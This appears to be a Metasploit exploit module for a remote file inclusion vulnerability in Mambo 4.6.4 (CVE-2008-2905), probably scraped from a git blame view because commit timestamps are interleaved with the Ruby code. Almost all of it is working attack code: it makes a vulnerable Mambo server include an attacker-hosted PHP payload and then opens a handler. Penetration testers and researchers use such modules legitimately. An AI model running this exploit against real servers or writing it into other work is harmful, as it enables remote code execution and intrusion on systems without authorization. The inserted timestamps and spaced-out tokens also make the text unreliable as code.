2010-04-30 08:40:19 +00:00
##
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-10-15 18:50:46 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
2009-12-15 18:47:29 +00:00
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2009-12-15 18:47:29 +00:00
2013-08-30 21:28:54 +00:00
include Msf :: Exploit :: Remote :: Tcp
include Msf :: Exploit :: Remote :: HttpClient
include Msf :: Exploit :: Remote :: HttpServer :: PHPInclude
2009-12-15 18:47:29 +00:00
2013-08-30 21:28:54 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include' ,
'Description' = > %q{
This module exploits a remote file inclusion vulnerability in
includes / Cache / Lite / Output . php in the Cache_Lite package in Mambo
4 . 6 . 4 and earlier .
} ,
'Author' = > [ 'MC' ] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'CVE' , '2008-2905' ] ,
[ 'OSVDB' , '46173' ] ,
[ 'BID' , '29716' ] ,
] ,
'Privileged' = > false ,
'Payload' = >
{
'DisableNops' = > true ,
'Compat' = >
{
'ConnectionType' = > 'find' ,
} ,
'Space' = > 32768 ,
} ,
'Platform' = > 'php' ,
'Arch' = > ARCH_PHP ,
'Targets' = > [ [ 'Automatic' , { } ] ] ,
'DisclosureDate' = > 'Jun 14 2008' ,
'DefaultTarget' = > 0 ) )
2010-04-30 08:40:19 +00:00
2013-08-30 21:28:54 +00:00
register_options (
[
OptString . new ( 'PHPURI' , [ true , " The URI to request, with the include parameter changed to !URL! " , " /includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL! " ] ) ,
] , self . class )
end
2009-12-15 18:47:29 +00:00
2013-08-30 21:28:54 +00:00
def php_exploit
2009-12-15 18:47:29 +00:00
2013-08-30 21:28:54 +00:00
timeout = 0 . 01
uri = datastore [ 'PHPURI' ] . gsub ( '!URL!' , Rex :: Text . to_hex ( php_include_url , " % " ) )
print_status ( " Trying uri #{ uri } " )
2009-12-15 18:47:29 +00:00
2013-08-30 21:28:54 +00:00
response = send_request_raw ( {
'global' = > true ,
'uri' = > uri ,
} , timeout )
2009-12-15 18:47:29 +00:00
2013-08-30 21:28:54 +00:00
if response and response . code != 200
print_error ( " Server returned non-200 status code ( #{ response . code } ) " )
end
2010-04-30 08:40:19 +00:00
2013-08-30 21:28:54 +00:00
handler
end
2009-12-15 18:47:29 +00:00
end